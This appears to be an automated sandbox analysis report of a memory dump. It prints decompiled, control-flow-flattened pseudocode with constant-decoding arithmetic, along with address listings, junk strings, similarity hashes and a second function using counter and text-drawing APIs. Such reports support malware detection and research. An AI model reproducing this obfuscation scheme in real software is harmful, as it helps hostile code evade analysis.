				_v284 = _v284 ^ 0x445fa743;
				_v284 = _v284 ^ 0x449ac94c;
				_v208 = 0xd2505b;
				_v208 = _v208 >> 0xd;
				_v208 = _v208 ^ 0x000e2a4e;
				_v468 = 0x8b2e02;
				_v468 = _v468 * 0x15;
				_v468 = _v468 + 0xffff1712;
				_v468 = _v468 ^ 0x0b6df89c;
				_v348 = 0x68259d;
				_v348 = _v348 + 0xffffb73e;
				_v348 = _v348 ^ 0x0068298c;
				_v640 = 0x6fec8e;
				_v640 = _v640 << 0xf;
				_v640 = _v640 | 0x4cc5a568;
				_v640 = _v640 << 0x10;
				_v640 = _v640 ^ 0xa56d00c3;
				_v616 = 0x9d66eb;
				_v616 = _v616 << 9;
				_v616 = _v616 | 0xc78959e6;
				_v616 = _v616 >> 0xf;
				_v616 = _v616 ^ 0x000f3669;
				_v444 = 0xca94bf;
				_v444 = _v444 >> 0xb;
				_v444 = _v444 ^ 0x838c2c0a;
				_v444 = _v444 ^ 0x838c5dae;
				_v560 = 0x4fc470;
				_v560 = _v560 + 0xc60;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 << 0xf;
				_v560 = _v560 ^ 0x0046c3f7;
				_v496 = 0x1b89fb;
				_v496 = _v496 ^ 0x4cd7b05d;
				_v496 = _v496 + 0xffff90b6;
				_v496 = _v496 ^ 0x4cc22336;
				_v544 = 0xef1e90;
				_v544 = _v544 / _t1300;
				_v544 = _v544 * 0x47;
				_v544 = _v544 + 0xb9e3;
				_v544 = _v544 ^ 0x01253a55;
				_v212 = 0x425875;
				_v212 = _v212 + 0x7431;
				_v212 = _v212 ^ 0x0041fedc;
				_v260 = 0x54a854;
				_v260 = _v260 | 0x1d514e27;
				_v260 = _v260 ^ 0x1d5761a0;
				_v584 = 0x39c2de;
				_v584 = _v584 | 0x4c80d3bc;
				_v584 = _v584 << 0xc;
				_v584 = _v584 | 0x441dde0c;
				_v584 = _v584 ^ 0xdd38fc4c;
				_v344 = 0x95cd3f;
				_v344 = _v344 ^ 0x4219606c;
				_v344 = _v344 ^ 0x42865e33;
				_v508 = 0xa24718;
				_v508 = _v508 ^ 0x0ba3a041;
				_v508 = _v508 + 0xffff081d;
				_t1301 = 0x6a;
				_v508 = _v508 * 0x1a;
				_v508 = _v508 ^ 0x1e12fccc;
				_v420 = 0x3d1d24;
				_v420 = _v420 / _t1301;
				_v420 = _v420 ^ 0x000d008e;
				_v360 = 0xb9f9fd;
				_v360 = _v360 << 0x10;
				_v360 = _v360 >> 8;
				_v360 = _v360 ^ 0x00f4144b;
				_v500 = 0x98528f;
				_v500 = _v500 + 0xffff38ee;
				_t1302 = 0x63;
				_v500 = _v500 * 0x15;
				_v500 = _v500 / _t1302;
				_v500 = _v500 ^ 0x0021bcf3;
				_v552 = 0x759a04;
				_v552 = _v552 ^ 0x24707ad6;
				_t1303 = 0x6e;
				_v552 = _v552 * 0x7a;
				_v552 = _v552 + 0xffffc280;
				_v552 = _v552 ^ 0x2bf8833e;
				_v432 = 0xe0fde6;
				_v432 = _v432 * 0x65;
				_v432 = _v432 << 5;
				_v432 = _v432 ^ 0x188550d0;
				_v412 = 0x5ec2e0;
				_v412 = _v412 * 0x55;
				_v412 = _v412 ^ 0x69c41202;
				_v412 = _v412 ^ 0x76b2a663;
				_v272 = 0x9cff2f;
				_v272 = _v272 ^ 0x9ba2f041;
				_v272 = _v272 ^ 0x9b3e00ce;
				_v264 = 0xc7d38e;
				_v264 = _v264 / _t1303;
				_v264 = _v264 ^ 0x0001ce4c;
				_v484 = 0x795f49;
				_v484 = _v484 << 5;
				_v484 = _v484 >> 0xa;
				_v484 = _v484 ^ 0x000e715a;
				_v652 = 0x133e50;
				_v652 = _v652 << 0xb;
				_v652 = _v652 | 0x562c81c4;
				_v652 = _v652 + 0xd02a;
				_v652 = _v652 ^ 0xdff2ea4e;
				_v536 = 0x9207c;
				_v536 = _v536 ^ 0xf6913151;
				_v536 = _v536 << 0xe;
				_v536 = _v536 * 0x45;
				_v536 = _v536 ^ 0x2846b420;
				_v328 = 0x351a5;
				_v328 = _v328 + 0xffffae72;
				_v328 = _v328 ^ 0x000df437;
				_v636 = 0x9ce8ca;
				_v636 = _v636 >> 2;
				_v636 = _v636 + 0xa040;
				_v636 = _v636 | 0x4a71b9c2;
				_v636 = _v636 ^ 0x4a778ec2;
				_v628 = 0xac61e6;
				_t1304 = 0x53;
				_v628 = _v628 / _t1304;
				_v628 = _v628 + 0xd452;
				_t1305 = 0x60;
				_v628 = _v628 / _t1305;
				_v628 = _v628 ^ 0x0000eda0;
				goto L1;
				do {
					while(1) {
						L1:
						_t1460 = _t1427 - 0x7b63c34;
						if(_t1460 > 0) {
							break;
						}
						if(_t1460 == 0) {
							_t1203 = E01062524();
							__eflags = _t1203;
							if(__eflags == 0) {
								L113:
								return _t1203;
							}
							_t1427 = 0x3dea847;
							continue;
						}
						_t1461 = _t1427 - 0x5c593cc;
						if(_t1461 > 0) {
							__eflags = _t1427 - 0x67c006a;
							if(__eflags > 0) {
								__eflags = _t1427 - 0x6a3e761;
								if(_t1427 == 0x6a3e761) {
									_t1203 = E01042A46();
									__eflags = _t1203;
									if(__eflags == 0) {
										goto L113;
									}
									_t1427 = 0x67c006a;
									continue;
								}
								__eflags = _t1427 - 0x6fcc186;
								if(_t1427 == 0x6fcc186) {
									_t1203 = E01043845();
									asm("sbb esi, esi");
									_t1427 = ( ~_t1203 & 0xf8d129f4) + 0x9e4a4e0;
									continue;
								}
								__eflags = _t1427 - 0x724357f;
								if(_t1427 == 0x724357f) {
									_t1203 = E0106292B();
									goto L113;
								}
								__eflags = _t1427 - 0x736300d;
								if(_t1427 != 0x736300d) {
									goto L110;
								}
								_t1203 = E01053741(_t1322);
								goto L113;
							}
							if(__eflags == 0) {
								E0105056A();
								_t1203 = E0105747E();
								asm("sbb esi, esi");
								_t1427 = ( ~_t1203 & 0x029c2de1) + 0x8ed89b7;
								continue;
							}
							__eflags = _t1427 - 0x5d70829;
							if(_t1427 == 0x5d70829) {
								_t1203 = E01054E8A();
								_t1427 = 0xbe677c5;
								continue;
							}
							__eflags = _t1427 - 0x5f75feb;
							if(_t1427 == 0x5f75feb) {
								_t1203 = E010578A5();
								_v140 = _t1203;
								_t1427 = 0xff36ff2;
								continue;
							}
							__eflags = _t1427 - 0x673fd33;
							if(_t1427 == 0x673fd33) {
								_t1203 = E0105747E();
								__eflags = _t1203;
								if(__eflags == 0) {
									_t1203 = E0105BFE8();
								}
								L13:
								_t1427 = 0x9c4010;
								continue;
							}
							__eflags = _t1427 - 0x67b0e1a;
							if(_t1427 != 0x67b0e1a) {
								goto L110;
							}
							_push(_v532);
							_t1203 = E0104F41F(_v516, _v524, _v224, _t1322);
							goto L113;
						}
						if(_t1461 == 0) {
							_t1203 = _v552;
							_t1427 = 0xa8d5876;
							_v156 = _t1203;
							continue;
						}
						_t1462 = _t1427 - 0x1bcf8e1;
						if(_t1462 > 0) {
							__eflags = _t1427 - 0x2b5ced4;
							if(_t1427 == 0x2b5ced4) {
								_t1203 = E0105D99A();
								_t1427 = 0x6a3e761;
								continue;
							}
							__eflags = _t1427 - 0x3104a35;
							if(_t1427 == 0x3104a35) {
								_t1203 = E0105748A();
								_t1427 = 0x1bcf8e1;
								continue;
							}
							__eflags = _t1427 - 0x3dea847;
							if(_t1427 == 0x3dea847) {
								_t1203 = E0105DEF4();
								__eflags = _t1203;
								if(__eflags == 0) {
									goto L113;
								}
								_t1427 = 0x6fcc186;
								continue;
							}
							__eflags = _t1427 - 0x4dcc622;
							if(_t1427 != 0x4dcc622) {
								goto L110;
							}
							_t1203 = E01042043(_v172, _v616, _v444, _v560);
							L29:
							_pop(_t1322);
							_t1427 = 0x84d4dd9;
							continue;
						}
						if(_t1462 == 0) {
							_v180 = E0104D10C(_v244,  &_v176, __eflags, _v568, 0x1041254, _v380, _v324);
							_t1227 = E0104D10C(_v404,  &_v184, __eflags, _v632, 0x10412b4, _v316, _v460);
							_push(_v204);
							_v188 = _t1227;
							_push(_v452);
							_t1228 = L0105A8F0( &_v180,  &_v188);
							asm("sbb esi, esi");
							_t1427 = ( ~_t1228 & 0x05b78faa) + 0x6f20070;
							E01060352(_v236, _v308, _v188, _v504);
							_t1203 = E01060352(_v300, _v624, _v180, _v364);
							_t1457 = _t1457 + 0x38;
							goto L110;
						}
						if(_t1427 == 0x9c4010) {
							_t1203 = E01042043(_v164, _v468, _v348, _v640);
							_t1427 = 0x4dcc622;
							continue;
						}
						if(_t1427 == 0xda7b66) {
							_t1203 = E01052FA2(E010618C9(), _v332,  &_v172, _v252, _v412, _v340,  &_v164, _v216);
							_t1457 = _t1457 + 0x18;
							asm("sbb esi, esi");
							_t1427 = ( ~_t1203 & 0x0055db1a) + 0xda7b66;
							continue;
						}
						if(_t1427 == 0x10b8ae6) {
							_t1203 = E01049384();
							__eflags = _t1203;
							if(__eflags == 0) {
								goto L113;
							}
							_t1427 = 0x7b63c34;
							continue;
						}
						if(_t1427 != 0x1305680) {
							goto L110;
						}
						_t1322 = _v472;
						_t1236 = E0105406E(_v472, _v648,  &_v68, _v576,  &_v164);
						_t1457 = _t1457 + 0xc;
						if(_t1236 != 0) {
							_t1203 = _v40;
							__eflags = _t1203 - 8;
							if(__eflags != 0) {
								__eflags = _t1203;
								if(__eflags == 0) {
									L18:
									_t1427 = 0x98f2637;
									continue;
								}
								__eflags = _t1203 - 1;
								if(__eflags != 0) {
									goto L13;
								}
								goto L18;
							}
							_t1427 = 0x724357f;
							continue;
						} else {
							_t1203 = E010455AF(_v536, _v484);
							_pop(_t1322);
							goto L13;
						}
					}
					__eflags = _t1427 - 0xbc1c91a;
					if(__eflags > 0) {
						__eflags = _t1427 - 0xe7bf1ec;
						if(__eflags > 0) {
							__eflags = _t1427 - 0xf9e9c9c;
							if(_t1427 == 0xf9e9c9c) {
								E01052F56( &_v100, _v232, _v240, _v368);
								_t1427 = 0xe796d92;
								goto L110;
							}
							__eflags = _t1427 - 0xfe9ceb8;
							if(_t1427 == 0xfe9ceb8) {
								_v152 = E0104879F();
								_t1203 = E0105F086(_v376, _t1202, _v248);
								_v148 = _t1203;
								_t1427 = 0xbc1c91a;
								goto L1;
							}
							__eflags = _t1427 - 0xff36ff2;
							if(_t1427 != 0xff36ff2) {
								goto L110;
							}
							_t1203 = E01044AF2();
							_v76 = _t1203;
							_t1427 = 0x5c593cc;
							goto L1;
						}
						if(__eflags == 0) {
							_t1203 = E01042E17();
							_t1427 = 0x3104a35;
							goto L1;
						}
						__eflags = _t1427 - 0xbdc33a8;
						if(_t1427 == 0xbdc33a8) {
							_t1203 = E01046FC4();
							asm("sbb esi, esi");
							_t1431 =  ~_t1203 & 0xf7ff1c2e;
							L90:
							_t1427 = _t1431 + 0xe7bf1ec;
							goto L1;
						}
						__eflags = _t1427 - 0xbe677c5;
						if(_t1427 == 0xbe677c5) {
							_t1203 = E01041A0A();
							_t1427 = 0x2b5ced4;
							goto L1;
						}
						__eflags = _t1427 - 0xca9901a;
						if(_t1427 == 0xca9901a) {
							E01062524();
							_t1278 = 0xfe9ceb8;
							_t1203 = E010455AF(_v264, _v272);
							goto L29;
						}
						__eflags = _t1427 - 0xe796d92;
						if(_t1427 != 0xe796d92) {
							goto L110;
						}
						_t1203 = E0104E21C( &_v172,  &_v156, _v288, _v400);
						asm("sbb esi, esi");
						_pop(_t1322);
						_t1427 = ( ~_t1203 & 0xfbfdb544) + 0x4dcc622;
						goto L1;
					}
					if(__eflags == 0) {
						_t1203 = E010598B1();
						_v124 = _t1203;
						_t1427 = 0x5f75feb;
						goto L1;
					}
					__eflags = _t1427 - 0x98f2637;
					if(__eflags > 0) {
						__eflags = _t1427 - 0x9e4a4e0;
						if(_t1427 == 0x9e4a4e0) {
							__eflags = E0105ECE3();
							if(__eflags == 0) {
								_t1203 = E0105747E();
								asm("sbb esi, esi");
								_t1427 = ( ~_t1203 & 0xf9f09064) + 0xbe677c5;
								goto L1;
							}
							_t1203 = E0105747E();
							asm("sbb esi, esi");
							_t1431 =  ~_t1203 & 0xfd6041bc;
							__eflags = _t1431;
							goto L90;
						}
						__eflags = _t1427 - 0xa8d5876;
						if(__eflags == 0) {
							_t1203 = _v432;
							_t1427 = 0xf9e9c9c;
							_v136 = _t1203;
							goto L1;
						}
						__eflags = _t1427 - 0xb3ae7c2;
						if(__eflags == 0) {
							_t1203 = E0105399B(__eflags);
							__eflags = _t1203;
							if(__eflags == 0) {
								goto L113;
							}
							_t1427 = 0x92a1e62;
							goto L1;
						}
						__eflags = _t1427 - 0xb89b798;
						if(_t1427 != 0xb89b798) {
							goto L110;
						}
						_t1203 = E0104A3DF();
						_t1427 = 0x8ed89b7;
						goto L1;
					}
					if(__eflags == 0) {
						_t1203 = E01046B25(_v520,  &_v24, _v456);
						_pop(_t1322);
						__eflags = _t1203;
						if(__eflags == 0) {
							_t1203 = _v40;
							__eflags = _t1203;
							if(_t1203 == 0) {
								_t1425 = E010455AF(_v328, _v652);
								_t1203 = _v40;
								_pop(_t1322);
							}
							__eflags = _t1203 - 1;
							if(__eflags == 0) {
								_t1203 = E010455AF(_v628, _v636);
								_pop(_t1322);
							}
						} else {
							_t1425 = _v656;
						}
						_t1278 = 0xf9e9c9c;
						_t1427 = 0x673fd33;
						goto L1;
					}
					__eflags = _t1427 - 0x84d4dd9;
					if(_t1427 == 0x84d4dd9) {
						__eflags = _t1425 - _v480;
						if(_t1425 == _v480) {
							L72:
							_t1427 = _t1278;
							goto L110;
						}
						_t1257 = E010618C9();
						_t1322 = _t1425;
						_t1203 = E010618D2(_t1425, _v544, _t1257, _v212, _v260);
						_t1457 = _t1457 + 0xc;
						__eflags = _t1203 - _v464;
						if(__eflags == 0) {
							_t1203 = L010455E8(_t1278);
							goto L72;
						}
						_t1427 = 0x736300d;
						goto L1;
					}
					__eflags = _t1427 - 0x8ed89b7;
					if(_t1427 == 0x8ed89b7) {
						_t1203 = E010443A2();
						_t1427 = 0x67b0e1a;
						goto L1;
					}
					__eflags = _t1427 - 0x9128461;
					if(__eflags == 0) {
						_t1427 = 0xb3ae7c2;
						goto L1;
					}
					__eflags = _t1427 - 0x92a1e62;
					if(_t1427 != 0x92a1e62) {
						goto L110;
					}
					_t1203 = E0105A370();
					_t1427 = 0x10b8ae6;
					goto L1;
					L110:
					__eflags = _t1427 - 0x6f20070;
				} while (__eflags != 0);
				goto L113;
			}

0x01055784
0x0105578a
0x01055797
0x010557af
0x010557b4
0x010557bd
0x010557c8
0x010557cd
0x010557d5
0x010557e2
0x010557e5
0x010557e8
0x010557ec
0x010557f4
0x010557fc
0x01055807
0x01055812
0x0105581d
0x01055828
0x0105583e
0x01055845
0x01055850
0x0105585d
0x01055860
0x01055864
0x01055869
0x01055871
0x01055879
0x01055884
0x01055897
0x0105589e
0x010558a9
0x010558b4
0x010558bc
0x010558c7
0x010558d2
0x010558da
0x010558df
0x010558e7
0x010558ef
0x010558f7
0x0105590d
0x0105591b
0x0105591e
0x0105592d
0x01055934
0x0105593f
0x0105594a
0x01055955
0x01055960
0x0105596b
0x01055976
0x01055981
0x0105598c
0x01055997
0x010559a2
0x010559af
0x010559b7
0x010559c5
0x010559ca
0x010559d4
0x010559d9
0x010559df
0x010559e7
0x010559f2
0x010559fa
0x01055a05
0x01055a10
0x01055a1b
0x01055a23
0x01055a2e
0x01055a39
0x01055a41
0x01055a4c
0x01055a54
0x01055a5c
0x01055a64
0x01055a6c
0x01055a74
0x01055a87
0x01055a8a
0x01055a91
0x01055a9c
0x01055aa7
0x01055ab2
0x01055aba
0x01055ac5
0x01055ad0
0x01055adb
0x01055ae6
0x01055aed
0x01055af8
0x01055b0a
0x01055b0f
0x01055b18
0x01055b23
0x01055b35
0x01055b3a
0x01055b43
0x01055b4e
0x01055b59
0x01055b64
0x01055b6f
0x01055b7a
0x01055b8c
0x01055b8f
0x01055b96
0x01055b9e
0x01055ba9
0x01055bb4
0x01055bbf
0x01055bca
0x01055bd5
0x01055beb
0x01055bf0
0x01055c01
0x01055c04
0x01055c0b
0x01055c16
0x01055c21
0x01055c2c
0x01055c37
0x01055c3f
0x01055c47
0x01055c4f
0x01055c57
0x01055c5f
0x01055c6a
0x01055c75
0x01055c80
0x01055c88
0x01055c90
0x01055c98
0x01055ca0
0x01055cab
0x01055cb3
0x01055cbe
0x01055cc9
0x01055cd4
0x01055ce3
0x01055cea
0x01055cf5
0x01055d00
0x01055d08
0x01055d1b
0x01055d22
0x01055d2d
0x01055d38
0x01055d4e
0x01055d55
0x01055d60
0x01055d6b
0x01055d76
0x01055d81
0x01055d8c
0x01055d97
0x01055d9f
0x01055daa
0x01055db5
0x01055dc0
0x01055dc8
0x01055dd0
0x01055dda
0x01055ddd
0x01055de1
0x01055de9
0x01055df1
0x01055dff
0x01055e03
0x01055e0b
0x01055e13
0x01055e1e
0x01055e29
0x01055e36
0x01055e48
0x01055e4d
0x01055e54
0x01055e5f
0x01055e67
0x01055e77
0x01055e82
0x01055e85
0x01055e89
0x01055e91
0x01055e9c
0x01055ea4
0x01055eab
0x01055eb6
0x01055ec1
0x01055ecc
0x01055ed7
0x01055ee2
0x01055eea
0x01055ef5
0x01055f00
0x01055f08
0x01055f14
0x01055f1d
0x01055f21
0x01055f29
0x01055f34
0x01055f3f
0x01055f4a
0x01055f55
0x01055f5d
0x01055f68
0x01055f73
0x01055f7e
0x01055f8e
0x01055f95
0x01055fa0
0x01055fab
0x01055fb6
0x01055fc1
0x01055fcc
0x01055fd4
0x01055fdf
0x01055ff2
0x01055ff9
0x01056004
0x0105600f
0x01056022
0x01056034
0x0105603b
0x01056046
0x01056051
0x01056059
0x01056064
0x0105606c
0x01056074
0x01056078
0x0105607b
0x0105607f
0x01056087
0x0105608f
0x010560a6
0x010560a9
0x010560aa
0x010560b1
0x010560b9
0x010560c4
0x010560d1
0x010560d5
0x010560df
0x010560e3
0x010560eb
0x010560f3
0x010560fb
0x01056100
0x01056104
0x0105610c
0x01056117
0x01056122
0x0105612d
0x01056138
0x01056143
0x0105614e
0x01056159
0x01056164
0x0105616f
0x0105617a
0x01056190
0x01056197
0x010561a2
0x010561b8
0x010561bf
0x010561ca
0x010561d5
0x010561e0
0x010561e8
0x010561f3
0x010561fb
0x01056205
0x01056209
0x01056211
0x01056219
0x01056224
0x0105622f
0x01056237
0x01056242
0x0105624d
0x0105625e
0x01056265
0x01056270
0x01056278
0x01056280
0x0105628d
0x01056291
0x01056299
0x010562a4
0x010562af
0x010562ba
0x010562cd
0x010562d4
0x010562df
0x010562ea
0x010562f5
0x010562fd
0x01056308
0x0105631e
0x01056323
0x0105632c
0x01056337
0x01056342
0x0105634d
0x01056355
0x01056360
0x0105636b
0x01056376
0x0105637e
0x01056389
0x01056394
0x0105639f
0x010563aa
0x010563bc
0x010563c1
0x010563ca
0x010563d5
0x010563e0
0x010563e8
0x010563f3
0x01056405
0x0105640a
0x01056413
0x0105641e
0x01056429
0x01056434
0x0105643f
0x0105644a
0x01056457
0x0105645a
0x0105645e
0x01056463
0x0105646b
0x01056473
0x0105647b
0x01056483
0x01056488
0x0105648d
0x01056495
0x010564a8
0x010564af
0x010564b7
0x010564c2
0x010564cd
0x010564d5
0x010564e0
0x010564eb
0x010564fe
0x01056505
0x01056510
0x0105651b
0x01056526
0x01056535
0x01056538
0x0105653f
0x0105654a
0x01056555
0x0105655f
0x01056567
0x01056572
0x0105657d
0x01056588
0x01056593
0x0105659e
0x010565a9
0x010565b4
0x010565bc
0x010565c4
0x010565d2
0x010565d7
0x010565db
0x010565e3
0x010565ee
0x010565f6
0x010565fe
0x01056609
0x01056614
0x0105661f
0x0105662a
0x01056635
0x0105663d
0x01056648
0x0105665b
0x01056662
0x0105666d
0x01056678
0x01056683
0x0105668e
0x01056699
0x010566a1
0x010566a6
0x010566ae
0x010566b3
0x010566bb
0x010566c3
0x010566c8
0x010566d0
0x010566d5
0x010566dd
0x010566e8
0x010566f0
0x010566fb
0x01056706
0x0105670e
0x01056716
0x0105671b
0x01056720
0x01056728
0x01056733
0x0105673e
0x01056749
0x01056754
0x01056768
0x01056777
0x0105677e
0x01056789
0x01056794
0x0105679f
0x010567aa
0x010567b5
0x010567c0
0x010567cb
0x010567d6
0x010567de
0x010567e6
0x010567eb
0x010567f3
0x010567fb
0x01056806
0x01056813
0x0105681e
0x01056829
0x01056834
0x01056849
0x0105684c
0x01056853
0x0105685e
0x01056874
0x0105687b
0x01056886
0x01056891
0x01056899
0x010568a1
0x010568ac
0x010568b7
0x010568ca
0x010568cd
0x010568df
0x010568e6
0x010568f1
0x010568fc
0x0105690f
0x01056910
0x01056914
0x0105691c
0x01056924
0x01056937
0x0105693e
0x01056946
0x01056951
0x01056964
0x0105696b
0x01056976
0x01056981
0x0105698c
0x01056997
0x010569a2
0x010569b6
0x010569bd
0x010569c8
0x010569d3
0x010569db
0x010569e3
0x010569ee
0x010569f6
0x010569fb
0x01056a03
0x01056a0b
0x01056a13
0x01056a1e
0x01056a29
0x01056a39
0x01056a40
0x01056a4b
0x01056a56
0x01056a61
0x01056a6c
0x01056a74
0x01056a79
0x01056a81
0x01056a89
0x01056a91
0x01056aa6
0x01056aab
0x01056ab1
0x01056abd
0x01056ace
0x01056ad2
0x01056ad2
0x01056ada
0x01056ada
0x01056ada
0x01056ada
0x01056ae0
0x00000000
0x00000000
0x01056ae6
0x01056f8b
0x01056f90
0x01056f92
0x010573bb
0x010573c2
0x010573c2
0x01056f98
0x00000000
0x01056f98
0x01056aec
0x01056af2
0x01056e02
0x01056e08
0x01056ef8
0x01056efe
0x01056f70
0x01056f75
0x01056f77
0x00000000
0x00000000
0x01056f7d
0x00000000
0x01056f7d
0x01056f00
0x01056f06
0x01056f46
0x01056f4f
0x01056f57
0x00000000
0x01056f57
0x01056f08
0x01056f0e
0x010573b6
0x00000000
0x010573b6
0x01056f14
0x01056f1a
0x00000000
0x00000000
0x01056f2e
0x00000000
0x01056f2e
0x01056e0e
0x01056ecc
0x01056edc
0x01056ee5
0x01056eed
0x00000000
0x01056eed
0x01056e14
0x01056e1a
0x01056eb6
0x01056ebb
0x00000000
0x01056ebb
0x01056e20
0x01056e26
0x01056e99
0x01056e9e
0x01056ea5
0x00000000
0x01056ea5
0x01056e28
0x01056e2e
0x01056e74
0x01056e79
0x01056e7b
0x01056e88
0x01056e88
0x01056b92
0x01056b92
0x00000000
0x01056b92
0x01056e30
0x01056e36
0x00000000
0x00000000
0x01056e3c
0x01056e59
0x00000000
0x01056e5e
0x01056af8
0x01056ded
0x01056df1
0x01056df6
0x00000000
0x01056df6
0x01056afe
0x01056b04
0x01056d49
0x01056d4f
0x01056dde
0x01056de3
0x00000000
0x01056de3
0x01056d55
0x01056d5b
0x01056dc8
0x01056dcd
0x00000000
0x01056dcd
0x01056d5d
0x01056d63
0x01056da6
0x01056dab
0x01056dad
0x00000000
0x00000000
0x01056db3
0x00000000
0x01056db3
0x01056d65
0x01056d6b
0x00000000
0x00000000
0x01056d87
0x01056d8c
0x01056d8d
0x01056d8e
0x00000000
0x01056d8e
0x01056b0a
0x01056ca5
0x01056cc3
0x01056cc8
0x01056cd6
0x01056cdd
0x01056ceb
0x01056d10
0x01056d18
0x01056d1e
0x01056d3c
0x01056d41
0x00000000
0x01056d41
0x01056b16
0x01056c5c
0x01056c63
0x00000000
0x01056c63
0x01056b22
0x01056c24
0x01056c29
0x01056c30
0x01056c38
0x00000000
0x01056c38
0x01056b2e
0x01056bcc
0x01056bd1
0x01056bd3
0x00000000
0x00000000
0x01056bd9
0x00000000
0x01056bd9
0x01056b3a
0x00000000
0x00000000
0x01056b57
0x01056b5f
0x01056b64
0x01056b69
0x01056b9c
0x01056ba3
0x01056ba6
0x01056bb2
0x01056bb4
0x01056bbb
0x01056bbb
0x00000000
0x01056bbb
0x01056bb6
0x01056bb9
0x00000000
0x00000000
0x00000000
0x01056bb9
0x01056ba8
0x00000000
0x01056b6b
0x01056b87
0x01056b8d
0x00000000
0x01056b90
0x01056b69
0x01056fa2
0x01056fa8
0x01057207
0x0105720d
0x010572ff
0x01057301
0x0105738e
0x01057395
0x00000000
0x01057395
0x01057303
0x01057309
0x01057354
0x0105735b
0x01057361
0x01057368
0x00000000
0x01057368
0x0105730b
0x01057311
0x00000000
0x00000000
0x0105731b
0x01057320
0x01057327
0x00000000
0x01057327
0x01057213
0x010572f0
0x010572f5
0x00000000
0x010572f5
0x01057219
0x0105721f
0x010572d6
0x010572df
0x010572e1
0x010571b4
0x010571b4
0x00000000
0x010571b4
0x01057225
0x0105722b
0x010572c0
0x010572c5
0x00000000
0x010572c5
0x01057231
0x01057237
0x01057283
0x0105728f
0x010572a6
0x00000000
0x010572ab
0x01057239
0x0105723f
0x00000000
0x00000000
0x01057261
0x0105726b
0x01057273
0x01057274
0x00000000
0x01057274
0x01056fae
0x010571f1
0x010571f6
0x010571fd
0x00000000
0x010571fd
0x01056fb4
0x01056fba
0x0105710c
0x01057112
0x01057191
0x01057193
0x010571ca
0x010571d3
0x010571db
0x00000000
0x010571db
0x010571a3
0x010571ac
0x010571ae
0x010571ae
0x00000000
0x010571ae
0x01057114
0x0105711a
0x0105716c
0x01057173
0x01057175
0x00000000
0x01057175
0x0105711c
0x01057122
0x01057155
0x0105715a
0x0105715c
0x00000000
0x00000000
0x01057162
0x00000000
0x01057162
0x01057124
0x0105712a
0x00000000
0x00000000
0x0105713b
0x01057140
0x00000000
0x01057140
0x01056fc0
0x0105709b
0x010570a0
0x010570a1
0x010570a3
0x010570ab
0x010570b2
0x010570b4
0x010570d5
0x010570d7
0x010570de
0x010570de
0x010570df
0x010570e2
0x010570f7
0x010570fd
0x010570fe
0x010570a5
0x010570a5
0x010570a5
0x01057100
0x01057102
0x00000000
0x01057102
0x01056fc6
0x01056fcc
0x01057027
0x0105702e
0x0105707f
0x0105707f
0x00000000
0x0105707f
0x01057037
0x01057043
0x01057054
0x01057059
0x0105705c
0x01057063
0x0105707a
0x00000000
0x0105707a
0x01057065
0x00000000
0x01057065
0x01056fce
0x01056fd4
0x01057018
0x0105701d
0x00000000
0x0105701d
0x01056fd6
0x01056fdc
0x01057000
0x00000000
0x01057000
0x01056fde
0x01056fe4
0x00000000
0x00000000
0x01056ff1
0x01056ff6
0x00000000
0x0105739a
0x0105739a
0x0105739a
0x00000000

Strings

YL9, xrefs: 01055A10
HG\, xrefs: 010565FE
I_y, xrefs: 010569C8
X, xrefs: 0105657D
| , xrefs: 01056A13
KB7, xrefs: 01056593
8, xrefs: 010562D4
H]9, xrefs: 01056074
R/, xrefs: 01055C47
g", xrefs: 01056138
dGK, xrefs: 01055D8C
W), xrefs: 01055FDF
%&, xrefs: 010559FA
!HR, xrefs: 01055FC1
r`, xrefs: 01055ADB
cT;, xrefs: 01055ED7
uXB, xrefs: 01056794
#^, xrefs: 010563E8
D3wL, xrefs: 0105643F
1t, xrefs: 0105679F
1mM#, xrefs: 01055D76

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: !HR$#^$%&$1mM#$1t$D3wL$HG\$I_y$KB7$R/$X$YL9$cT;$dGK$g"$r`$uXB$| $H]9$W)$8
API String ID: 0-1856653443
Opcode ID: e33611fe43bf25d14c66132595ea3342aa56a8cadec15e4e2dbc02ab3b2a3a4f
Instruction ID: a2c0238943b3e37f7038dd8a3c543212ec5753d406145f344697653c46dba1cf
Opcode Fuzzy Hash: e33611fe43bf25d14c66132595ea3342aa56a8cadec15e4e2dbc02ab3b2a3a4f
Instruction Fuzzy Hash: 9DD212715093818BD3B8CF25C58ABCFBBE1BB94314F50891DEAD99A260DBB19944CF43

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C1CD0, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 462COMMON

Download Yara Rule

APIs

PdhCollectQueryData.PDH(?,B5334A76,?,?,?,?,6E9E9DAB,000000FF), ref: 6E9C1D77
PdhGetFormattedCounterValue.PDH(?,00000200,00000000,?,?,?,6E9E9DAB,000000FF), ref: 6E9C1DE1
GetTextMetricsW.GDI32(?,?,00000010,?), ref: 6E9C1F40
GetClientRect.USER32 ref: 6E9C224B
GetDeviceCaps.GDI32(?,0000005A), ref: 6E9C22C0
MulDiv.KERNEL32(?,00000000,00000048), ref: 6E9C22D5
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6E9C22FA
SetTextColor.GDI32(?,?), ref: 6E9C2312
SelectObject.GDI32(?,00000000), ref: 6E9C231A
DrawTextW.USER32(?,?,?,?,00000000), ref: 6E9C2356
SelectObject.GDI32(?,00000000), ref: 6E9C2363
DeleteObject.GDI32(00000000), ref: 6E9C236A

Strings

%s%s%s, xrefs: 6E9C21F2
%s%d.%d%s, xrefs: 6E9C2198
[N/A], xrefs: 6E9C2117

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectText$Select$CapsClientCollectColorCounterCreateDataDeleteDeviceDrawFontFormattedMetricsQueryRectValue
String ID: %s%d.%d%s$%s%s%s$[N/A]
API String ID: 4229994797-711029782
Opcode ID: 50ff99ee67353e9cd94fafb72e4cfd785924bdb8a2cd0e470ddc03ac971eab97
